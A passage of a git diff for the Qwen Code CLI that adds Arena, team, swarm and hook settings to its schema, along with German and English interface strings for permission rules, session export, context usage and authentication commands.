Base Directory', + category: 'Advanced', + requiresRestart: true, + default: undefined as string | undefined, + description: + 'Custom base directory for Arena worktrees. 
Defaults to ~/.qwen/arena.', + showInDialog: false, + }, + preserveArtifacts: { + type: 'boolean', + label: 'Preserve Arena Artifacts', + category: 'Advanced', + requiresRestart: false, + default: false, + description: + 'When enabled, Arena worktrees and session state files are preserved after the session ends or the main agent exits.', + showInDialog: true, + }, + maxRoundsPerAgent: { + type: 'number', + label: 'Max Rounds Per Agent', + category: 'Advanced', + requiresRestart: false, + default: undefined as number | undefined, + description: + 'Maximum number of rounds (turns) each agent can execute. No limit if unset.', + showInDialog: false, + }, + timeoutSeconds: { + type: 'number', + label: 'Timeout (seconds)', + category: 'Advanced', + requiresRestart: false, + default: undefined as number | undefined, + description: + 'Total timeout in seconds for the Arena session. No limit if unset.', + showInDialog: false, + }, + }, + }, + team: { + type: 'object', + label: 'Team', + category: 'Advanced', + requiresRestart: false, + default: {}, + description: + 'Settings for Agent Team (role-based collaborative execution). Reserved for future use.', + showInDialog: false, + }, + swarm: { + type: 'object', + label: 'Swarm', + category: 'Advanced', + requiresRestart: false, + default: {}, + description: + 'Settings for Agent Swarm (parallel sub-agent execution). Reserved for future use.', + showInDialog: false, + }, + }, + }, hooksConfig: { type: 'object', @@ -1233,6 +1447,7 @@ const SETTINGS_SCHEMA = { 'Hooks that execute before agent processing. Can modify prompts or inject context.', showInDialog: false, mergeStrategy: MergeStrategy.CONCAT, + items: HOOK_DEFINITION_ITEMS, }, Stop: { type: 'array', @@ -1244,9 +1459,124 @@ const SETTINGS_SCHEMA = { 'Hooks that execute after agent processing. 
Can post-process responses or log interactions.', showInDialog: false, mergeStrategy: MergeStrategy.CONCAT, + items: HOOK_DEFINITION_ITEMS, + }, + Notification: { + type: 'array', + label: 'Notification Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute when notifications are sent.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PreToolUse: { + type: 'array', + label: 'Pre Tool Use Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute before tool execution.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PostToolUse: { + type: 'array', + label: 'Post Tool Use Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute after successful tool execution.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PostToolUseFailure: { + type: 'array', + label: 'Post Tool Use Failure Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute when tool execution fails. 
', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + SessionStart: { + type: 'array', + label: 'Session Start Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute when a new session starts or resumes.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + SessionEnd: { + type: 'array', + label: 'Session End Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute when a session ends.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PreCompact: { + type: 'array', + label: 'Pre Compact Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: 'Hooks that execute before conversation compaction.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + SubagentStart: { + type: 'array', + label: 'Subagent Start Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: + 'Hooks that execute when a subagent (Task tool call) is started.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + SubagentStop: { + type: 'array', + label: 'Subagent Stop Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: + 'Hooks that execute right before a subagent (Task tool call) concludes its response.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, + }, + PermissionRequest: { + type: 'array', + label: 'Permission Request Hooks', + category: 'Advanced', + requiresRestart: false, + default: [], + description: + 'Hooks that execute when a permission dialog is displayed.', + showInDialog: false, + mergeStrategy: MergeStrategy.CONCAT, }, }, }, + + experimental: { + type: 'object', + label: 'Experimental', + category: 'Experimental', + requiresRestart: true, + default: {}, + description: 'Setting to enable experimental features', + showInDialog: false, + properties: {}, + }, } as const satisfies 
SettingsSchema; export type SettingsSchemaType = typeof SETTINGS_SCHEMA; diff --git a/packages/cli/src/constants/codingPlan.ts b/packages/cli/src/constants/codingPlan.ts index bc28a781a..87be46542 100644 --- a/packages/cli/src/constants/codingPlan.ts +++ b/packages/cli/src/constants/codingPlan.ts @@ -97,7 +97,7 @@ export function generateCodingPlanTemplate( extra_body: { enable_thinking: true, }, - contextWindowSize: 1000000, + contextWindowSize: 196608, }, }, { @@ -222,7 +222,7 @@ export function generateCodingPlanTemplate( extra_body: { enable_thinking: true, }, - contextWindowSize: 1000000, + contextWindowSize: 196608, }, }, { diff --git a/packages/cli/src/gemini.test.tsx b/packages/cli/src/gemini.test.tsx index 9b47de5b5..b9ddb97fa 100644 --- a/packages/cli/src/gemini.test.tsx +++ b/packages/cli/src/gemini.test.tsx @@ -467,6 +467,8 @@ describe('gemini.tsx main function kitty protocol', () => { debug: undefined, prompt: undefined, promptInteractive: undefined, + systemPrompt: undefined, + appendSystemPrompt: undefined, query: undefined, yolo: undefined, approvalMode: undefined, diff --git a/packages/cli/src/gemini.tsx b/packages/cli/src/gemini.tsx index 58a735c73..477aecd7e 100644 --- a/packages/cli/src/gemini.tsx +++ b/packages/cli/src/gemini.tsx @@ -35,6 +35,7 @@ import { KeypressProvider } from './ui/contexts/KeypressContext.js'; import { SessionStatsProvider } from './ui/contexts/SessionContext.js'; import { SettingsContext } from './ui/contexts/SettingsContext.js'; import { VimModeProvider } from './ui/contexts/VimModeContext.js'; +import { AgentViewProvider } from './ui/contexts/AgentViewContext.js'; import { useKittyKeyboardProtocol } from './ui/hooks/useKittyKeyboardProtocol.js'; import { themeManager } from './ui/themes/theme-manager.js'; import { detectAndEnableKittyProtocol } from './ui/utils/kittyProtocolDetector.js'; @@ -162,13 +163,15 @@ export async function startInteractiveUI( > - + + + @@ -348,6 +351,7 @@ export async function main() { argv, 
process.cwd(), argv.extensions, + settings, ); // Register cleanup for MCP clients as early as possible diff --git a/packages/cli/src/i18n/locales/de.js b/packages/cli/src/i18n/locales/de.js index 455411096..aa4a6d552 100644 --- a/packages/cli/src/i18n/locales/de.js +++ b/packages/cli/src/i18n/locales/de.js @@ -99,6 +99,7 @@ export default { 'Analysiert das Projekt und erstellt eine maßgeschneiderte QWEN.md-Datei.', 'List available Qwen Code tools. Usage: /tools [desc]': 'Verfügbare Qwen Code Werkzeuge auflisten. Verwendung: /tools [desc]', + 'List available skills.': 'Verfügbare Skills auflisten.', 'Available Qwen Code CLI tools:': 'Verfügbare Qwen Code CLI-Werkzeuge:', 'No tools available': 'Keine Werkzeuge verfügbar', 'View or change the approval mode for tool usage': @@ -376,6 +377,7 @@ export default { 'Diese Editoren werden derzeit unterstützt. Bitte beachten Sie, dass einige Editoren nicht im Sandbox-Modus verwendet werden können.', 'Your preferred editor is:': 'Ihr bevorzugter Editor ist:', 'Manage extensions': 'Erweiterungen verwalten', + 'Manage installed extensions': 'Installierte Erweiterungen verwalten', 'List active extensions': 'Aktive Erweiterungen auflisten', 'Update extensions. Usage: update |--all': 'Erweiterungen aktualisieren. 
Verwendung: update |--all', @@ -585,6 +587,38 @@ export default { 'Fehler beim Konfigurieren von {{terminalName}}.', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'Ihr Terminal ist bereits für optimale Erfahrung mit mehrzeiliger Eingabe konfiguriert (Umschalt+Enter und Strg+Enter).', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Qwen Code-Hooks verwalten', + 'List all configured hooks': 'Alle konfigurierten Hooks auflisten', + 'Enable a disabled hook': 'Einen deaktivierten Hook aktivieren', + 'Disable an active hook': 'Einen aktiven Hook deaktivieren', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + 'Den Nachrichtenverlauf der aktuellen Sitzung in eine Datei exportieren', + 'Export session to HTML format': 'Sitzung in das HTML-Format exportieren', + 'Export session to JSON format': 'Sitzung in das JSON-Format exportieren', + 'Export session to JSONL format (one message per line)': + 'Sitzung in das JSONL-Format exportieren (eine Nachricht pro Zeile)', + 'Export session to markdown format': + 'Sitzung in das Markdown-Format exportieren', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'Personalisierte Programmier-Einblicke aus Ihrem Chatverlauf generieren', + + // ============================================================================ + // Commands - Session History + // 
============================================================================ + 'Resume a previous session': 'Eine vorherige Sitzung fortsetzen', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'Einen Tool-Aufruf wiederherstellen. Dadurch werden Konversations- und Dateiverlauf auf den Zustand zurückgesetzt, in dem der Tool-Aufruf vorgeschlagen wurde', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'Terminal-Typ konnte nicht erkannt werden. Unterstützte Terminals: VS Code, Cursor, Windsurf und Trae.', 'Terminal "{{terminal}}" is not supported yet.': @@ -1012,6 +1046,8 @@ export default { "Allow execution of: '{{command}}'?": "Ausführung erlauben von: '{{command}}'?", 'Yes, allow always ...': 'Ja, immer erlauben ...', + 'Always allow in this project': 'In diesem Projekt immer erlauben', + 'Always allow for this user': 'Für diesen Benutzer immer erlauben', 'Yes, and auto-accept edits': 'Ja, und Änderungen automatisch akzeptieren', 'Yes, and manually approve edits': 'Ja, und Änderungen manuell genehmigen', 'No, keep planning (esc)': 'Nein, weiter planen (Esc)', @@ -1180,6 +1216,75 @@ export default { // Dialogs - Permissions // ============================================================================ 'Manage folder trust settings': 'Ordnervertrauenseinstellungen verwalten', + 'Manage permission rules': 'Berechtigungsregeln verwalten', + Allow: 'Erlauben', + Ask: 'Fragen', + Deny: 'Verweigern', + Workspace: 'Arbeitsbereich', + "Qwen Code won't ask before using allowed tools.": + 'Qwen Code fragt nicht, bevor erlaubte Tools verwendet werden.', + 'Qwen Code will ask before using these tools.': + 'Qwen Code fragt, bevor diese Tools verwendet werden.', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code darf verweigerte Tools nicht verwenden.', + 'Manage trusted directories for this workspace.': + 'Vertrauenswürdige Verzeichnisse 
für diesen Arbeitsbereich verwalten.', + 'Any use of the {{tool}} tool': 'Jede Verwendung des {{tool}}-Tools', + "{{tool}} commands matching '{{pattern}}'": + "{{tool}}-Befehle, die '{{pattern}}' entsprechen", + 'From user settings': 'Aus Benutzereinstellungen', + 'From project settings': 'Aus Projekteinstellungen', + 'From session': 'Aus Sitzung', + 'Project settings (local)': 'Projekteinstellungen (lokal)', + 'Saved in .qwen/settings.local.json': + 'Gespeichert in .qwen/settings.local.json', + 'Project settings': 'Projekteinstellungen', + 'Checked in at .qwen/settings.json': 'Eingecheckt in .qwen/settings.json', + 'User settings': 'Benutzereinstellungen', + 'Saved in at ~/.qwen/settings.json': 'Gespeichert in ~/.qwen/settings.json', + 'Add a new rule…': 'Neue Regel hinzufügen…', + 'Add {{type}} permission rule': '{{type}}-Berechtigungsregel hinzufügen', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + 'Berechtigungsregeln sind ein Toolname, optional gefolgt von einem Bezeichner in Klammern.', + 'e.g.,': 'z.B.', + or: 'oder', + 'Enter permission rule…': 'Berechtigungsregel eingeben…', + 'Enter to submit · Esc to cancel': 'Enter zum Absenden · Esc zum Abbrechen', + 'Where should this rule be saved?': 'Wo soll diese Regel gespeichert werden?', + 'Enter to confirm · Esc to cancel': + 'Enter zum Bestätigen · Esc zum Abbrechen', + 'Delete {{type}} rule?': '{{type}}-Regel löschen?', + 'Are you sure you want to delete this permission rule?': + 'Sind Sie sicher, dass Sie diese Berechtigungsregel löschen möchten?', + 'Permissions:': 'Berechtigungen:', + '(←/→ or tab to cycle)': '(←/→ oder Tab zum Wechseln)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '↑↓ navigieren · Enter auswählen · Tippen suchen · Esc abbrechen', + 'Search…': 'Suche…', + 'Use /trust to manage folder trust settings for this workspace.': + 'Verwenden Sie /trust, um die Ordnervertrauenseinstellungen für diesen Arbeitsbereich zu 
verwalten.', + // Workspace directory management + 'Add directory…': 'Verzeichnis hinzufügen…', + 'Add directory to workspace': 'Verzeichnis zum Arbeitsbereich hinzufügen', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code kann Dateien im Arbeitsbereich lesen und Bearbeitungen vornehmen, wenn die automatische Akzeptierung aktiviert ist.', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code kann Dateien in diesem Verzeichnis lesen und Bearbeitungen vornehmen, wenn die automatische Akzeptierung aktiviert ist.', + 'Enter the path to the directory:': 'Pfad zum Verzeichnis eingeben:', + 'Enter directory path…': 'Verzeichnispfad eingeben…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab zum Vervollständigen · Enter zum Hinzufügen · Esc zum Abbrechen', + 'Remove directory?': 'Verzeichnis entfernen?', + 'Are you sure you want to remove this directory from the workspace?': + 'Möchten Sie dieses Verzeichnis wirklich aus dem Arbeitsbereich entfernen?', + ' (Original working directory)': ' (Ursprüngliches Arbeitsverzeichnis)', + ' (from settings)': ' (aus Einstellungen)', + 'Directory does not exist.': 'Verzeichnis existiert nicht.', + 'Path is not a directory.': 'Pfad ist kein Verzeichnis.', + 'This directory is already in the workspace.': + 'Dieses Verzeichnis ist bereits im Arbeitsbereich.', + 'Already covered by existing directory: {{dir}}': + 'Bereits durch vorhandenes Verzeichnis abgedeckt: {{dir}}', // ============================================================================ // Status Bar @@ -1586,6 +1691,36 @@ export default { 'Neue Modellkonfigurationen sind für {{region}} verfügbar. Jetzt aktualisieren?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': '{{region}}-Konfiguration erfolgreich aktualisiert. Modell auf "{{model}}" umgeschaltet.', + 'Authenticated successfully with {{region}}. 
API key and model configs saved to settings.json (backed up).': + 'Erfolgreich mit {{region}} authentifiziert. API-Schlüssel und Modellkonfigurationen wurden in settings.json gespeichert (gesichert).', + + // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'Kontextnutzung', + 'No API response yet. Send a message to see actual usage.': + 'Noch keine API-Antwort. Senden Sie eine Nachricht, um die tatsächliche Nutzung anzuzeigen.', + 'Estimated pre-conversation overhead': + 'Geschätzte Vorabkosten vor der Unterhaltung', + 'Context window': 'Kontextfenster', + tokens: 'Tokens', + Used: 'Verwendet', + Free: 'Frei', + 'Autocompact buffer': 'Autokomprimierungs-Puffer', + 'Usage by category': 'Verwendung nach Kategorie', + 'System prompt': 'System-Prompt', + 'Built-in tools': 'Integrierte Tools', + 'MCP tools': 'MCP-Tools', + 'Memory files': 'Speicherdateien', + Skills: 'Fähigkeiten', + Messages: 'Nachrichten', + 'Show context window usage breakdown.': + 'Zeigt die Aufschlüsselung der Kontextfenster-Nutzung an.', + 'Run /context detail for per-item breakdown.': + 'Führen Sie /context detail für eine Aufschlüsselung nach Elementen aus.', + active: 'aktiv', + 'body loaded': 'Inhalt geladen', + memory: 'Speicher', '{{region}} configuration updated successfully.': '{{region}}-Konfiguration erfolgreich aktualisiert.', 'Authenticated successfully with {{region}}. 
API key and model configs saved to settings.json.': @@ -1621,4 +1756,80 @@ export default { '↑/↓: Navigieren | Space/Enter: Umschalten | Esc: Abbrechen', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: Navigieren | Enter: Auswählen | Esc: Abbrechen', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Qwen-Authentifizierung mit Qwen-OAuth oder Alibaba Cloud Coding Plan konfigurieren', + 'Authenticate using Qwen OAuth': 'Mit Qwen OAuth authentifizieren', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Mit Alibaba Cloud Coding Plan authentifizieren', + 'Region for Coding Plan (china/global)': + 'Region für Coding Plan (china/global)', + 'API key for Coding Plan': 'API-Schlüssel für Coding Plan', + 'Show current authentication status': + 'Aktuellen Authentifizierungsstatus anzeigen', + 'Authentication completed successfully.': + 'Authentifizierung erfolgreich abgeschlossen.', + 'Starting Qwen OAuth authentication...': + 'Qwen OAuth-Authentifizierung wird gestartet...', + 'Successfully authenticated with Qwen OAuth.': + 'Erfolgreich mit Qwen OAuth authentifiziert.', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Authentifizierung mit Qwen OAuth fehlgeschlagen: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Alibaba Cloud Coding Plan-Authentifizierung wird verarbeitet...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Erfolgreich mit Alibaba Cloud Coding Plan authentifiziert.', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Authentifizierung mit Coding Plan fehlgeschlagen: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'Global', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select 
region for Coding Plan:': 'Region für Coding Plan auswählen:', + 'Enter your Coding Plan API key: ': + 'Geben Sie Ihren Coding Plan API-Schlüssel ein: ', + 'Select authentication method:': 'Authentifizierungsmethode auswählen:', + '\n=== Authentication Status ===\n': '\n=== Authentifizierungsstatus ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ Keine Authentifizierungsmethode konfiguriert.\n', + 'Run one of the following commands to get started:\n': + 'Führen Sie einen der folgenden Befehle aus, um zu beginnen:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Mit Qwen OAuth authentifizieren (kostenlos)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Mit Alibaba Cloud Coding Plan authentifizieren\n', + 'Or simply run:': 'Oder einfach ausführen:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - Interaktive Authentifizierungseinrichtung\n', + '✓ Authentication Method: Qwen OAuth': + '✓ Authentifizierungsmethode: Qwen OAuth', + ' Type: Free tier': ' Typ: Kostenlos', + ' Limit: Up to 1,000 requests/day': ' Limit: Bis zu 1.000 Anfragen/Tag', + ' Models: Qwen latest models\n': ' Modelle: Qwen neueste Modelle\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ Authentifizierungsmethode: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'Global - Alibaba Cloud', + ' Region: {{region}}': ' Region: {{region}}', + ' Current Model: {{model}}': ' Aktuelles Modell: {{model}}', + ' Config Version: {{version}}': ' Konfigurationsversion: {{version}}', + ' Status: API key configured\n': ' Status: API-Schlüssel konfiguriert\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ Authentifizierungsmethode: Alibaba Cloud Coding Plan (Unvollständig)', + ' Issue: API key not found in environment or settings\n': + ' Problem: API-Schlüssel nicht in Umgebung 
oder Einstellungen gefunden\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' Führen Sie `qwen auth coding-plan` aus, um neu zu konfigurieren.\n', + '✓ Authentication Method: {{type}}': '✓ Authentifizierungsmethode: {{type}}', + ' Status: Configured\n': ' Status: Konfiguriert\n', + 'Failed to check authentication status: {{error}}': + 'Authentifizierungsstatus konnte nicht überprüft werden: {{error}}', + 'Select an option:': 'Option auswählen:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Raw-Modus nicht verfügbar. Bitte in einem interaktiven Terminal ausführen.', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(↑ ↓ Pfeiltasten zum Navigieren, Enter zum Auswählen, Strg+C zum Beenden)\n', }; diff --git a/packages/cli/src/i18n/locales/en.js b/packages/cli/src/i18n/locales/en.js index cbaee7889..fb4433b2a 100644 --- a/packages/cli/src/i18n/locales/en.js +++ b/packages/cli/src/i18n/locales/en.js @@ -118,6 +118,7 @@ export default { 'Analyzes the project and creates a tailored QWEN.md file.', 'List available Qwen Code tools. Usage: /tools [desc]': 'List available Qwen Code tools. Usage: /tools [desc]', + 'List available skills.': 'List available skills.', 'Available Qwen Code CLI tools:': 'Available Qwen Code CLI tools:', 'No tools available': 'No tools available', 'View or change the approval mode for tool usage': @@ -459,6 +460,7 @@ export default { 'These editors are currently supported. Please note that some editors cannot be used in sandbox mode.', 'Your preferred editor is:': 'Your preferred editor is:', 'Manage extensions': 'Manage extensions', + 'Manage installed extensions': 'Manage installed extensions', 'List active extensions': 'List active extensions', 'Update extensions. Usage: update |--all': 'Update extensions. 
Usage: update |--all', @@ -659,6 +661,37 @@ export default { 'Failed to configure {{terminalName}}.', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Manage Qwen Code hooks', + 'List all configured hooks': 'List all configured hooks', + 'Enable a disabled hook': 'Enable a disabled hook', + 'Disable an active hook': 'Disable an active hook', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + 'Export current session message history to a file', + 'Export session to HTML format': 'Export session to HTML format', + 'Export session to JSON format': 'Export session to JSON format', + 'Export session to JSONL format (one message per line)': + 'Export session to JSONL format (one message per line)', + 'Export session to markdown format': 'Export session to markdown format', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'generate personalized programming insights from your chat history', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': 'Resume a previous session', + 'Restore a tool call. 
This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.', 'Terminal "{{terminal}}" is not supported yet.': @@ -1069,6 +1102,8 @@ export default { 'No, suggest changes (esc)': 'No, suggest changes (esc)', "Allow execution of: '{{command}}'?": "Allow execution of: '{{command}}'?", 'Yes, allow always ...': 'Yes, allow always ...', + 'Always allow in this project': 'Always allow in this project', + 'Always allow for this user': 'Always allow for this user', 'Yes, and auto-accept edits': 'Yes, and auto-accept edits', 'Yes, and manually approve edits': 'Yes, and manually approve edits', 'No, keep planning (esc)': 'No, keep planning (esc)', @@ -1233,6 +1268,73 @@ export default { // Dialogs - Permissions // ============================================================================ 'Manage folder trust settings': 'Manage folder trust settings', + 'Manage permission rules': 'Manage permission rules', + Allow: 'Allow', + Ask: 'Ask', + Deny: 'Deny', + Workspace: 'Workspace', + "Qwen Code won't ask before using allowed tools.": + "Qwen Code won't ask before using allowed tools.", + 'Qwen Code will ask before using these tools.': + 'Qwen Code will ask before using these tools.', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code is not allowed to use denied tools.', + 'Manage trusted directories for this workspace.': + 'Manage trusted directories for this workspace.', + 'Any use of the {{tool}} tool': 'Any use of the {{tool}} tool', + "{{tool}} commands matching '{{pattern}}'": + "{{tool}} commands matching '{{pattern}}'", + 'From user settings': 'From user settings', + 'From project settings': 'From 
project settings', + 'From session': 'From session', + 'Project settings (local)': 'Project settings (local)', + 'Saved in .qwen/settings.local.json': 'Saved in .qwen/settings.local.json', + 'Project settings': 'Project settings', + 'Checked in at .qwen/settings.json': 'Checked in at .qwen/settings.json', + 'User settings': 'User settings', + 'Saved in at ~/.qwen/settings.json': 'Saved in at ~/.qwen/settings.json', + 'Add a new rule…': 'Add a new rule…', + 'Add {{type}} permission rule': 'Add {{type}} permission rule', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.', + 'e.g.,': 'e.g.,', + or: 'or', + 'Enter permission rule…': 'Enter permission rule…', + 'Enter to submit · Esc to cancel': 'Enter to submit · Esc to cancel', + 'Where should this rule be saved?': 'Where should this rule be saved?', + 'Enter to confirm · Esc to cancel': 'Enter to confirm · Esc to cancel', + 'Delete {{type}} rule?': 'Delete {{type}} rule?', + 'Are you sure you want to delete this permission rule?': + 'Are you sure you want to delete this permission rule?', + 'Permissions:': 'Permissions:', + '(←/→ or tab to cycle)': '(←/→ or tab to cycle)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel', + 'Search…': 'Search…', + 'Use /trust to manage folder trust settings for this workspace.': + 'Use /trust to manage folder trust settings for this workspace.', + // Workspace directory management + 'Add directory…': 'Add directory…', + 'Add directory to workspace': 'Add directory to workspace', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits 
is on.': + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.', + 'Enter the path to the directory:': 'Enter the path to the directory:', + 'Enter directory path…': 'Enter directory path…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab to complete · Enter to add · Esc to cancel', + 'Remove directory?': 'Remove directory?', + 'Are you sure you want to remove this directory from the workspace?': + 'Are you sure you want to remove this directory from the workspace?', + ' (Original working directory)': ' (Original working directory)', + ' (from settings)': ' (from settings)', + 'Directory does not exist.': 'Directory does not exist.', + 'Path is not a directory.': 'Path is not a directory.', + 'This directory is already in the workspace.': + 'This directory is already in the workspace.', + 'Already covered by existing directory: {{dir}}': + 'Already covered by existing directory: {{dir}}', // ============================================================================ // Status Bar @@ -1639,6 +1741,34 @@ export default { 'New model configurations are available for {{region}}. Update now?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': '{{region}} configuration updated successfully. Model switched to "{{model}}".', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).', + + // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'Context Usage', + 'No API response yet. Send a message to see actual usage.': + 'No API response yet. 
Send a message to see actual usage.', + 'Estimated pre-conversation overhead': 'Estimated pre-conversation overhead', + 'Context window': 'Context window', + tokens: 'tokens', + Used: 'Used', + Free: 'Free', + 'Autocompact buffer': 'Autocompact buffer', + 'Usage by category': 'Usage by category', + 'System prompt': 'System prompt', + 'Built-in tools': 'Built-in tools', + 'MCP tools': 'MCP tools', + 'Memory files': 'Memory files', + Skills: 'Skills', + Messages: 'Messages', + 'Show context window usage breakdown.': + 'Show context window usage breakdown.', + 'Run /context detail for per-item breakdown.': + 'Run /context detail for per-item breakdown.', + 'body loaded': 'body loaded', + memory: 'memory', '{{region}} configuration updated successfully.': '{{region}} configuration updated successfully.', 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json.': @@ -1673,4 +1803,77 @@ export default { '↑/↓: Navigate | Space/Enter: Toggle | Esc: Cancel', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: Navigate | Enter: Select | Esc: Cancel', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan', + 'Authenticate using Qwen OAuth': 'Authenticate using Qwen OAuth', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Authenticate using Alibaba Cloud Coding Plan', + 'Region for Coding Plan (china/global)': + 'Region for Coding Plan (china/global)', + 'API key for Coding Plan': 'API key for Coding Plan', + 'Show current authentication status': 'Show current authentication status', + 'Authentication completed successfully.': + 'Authentication completed successfully.', + 'Starting Qwen OAuth authentication...': + 'Starting 
Qwen OAuth authentication...', + 'Successfully authenticated with Qwen OAuth.': + 'Successfully authenticated with Qwen OAuth.', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Failed to authenticate with Qwen OAuth: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Processing Alibaba Cloud Coding Plan authentication...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Successfully authenticated with Alibaba Cloud Coding Plan.', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Failed to authenticate with Coding Plan: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'Global', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Select region for Coding Plan:', + 'Enter your Coding Plan API key: ': 'Enter your Coding Plan API key: ', + 'Select authentication method:': 'Select authentication method:', + '\n=== Authentication Status ===\n': '\n=== Authentication Status ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ No authentication method configured.\n', + 'Run one of the following commands to get started:\n': + 'Run one of the following commands to get started:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n', + 'Or simply run:': 'Or simply run:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - Interactive authentication setup\n', + '✓ Authentication Method: Qwen OAuth': '✓ Authentication Method: Qwen OAuth', + ' Type: Free tier': ' Type: Free 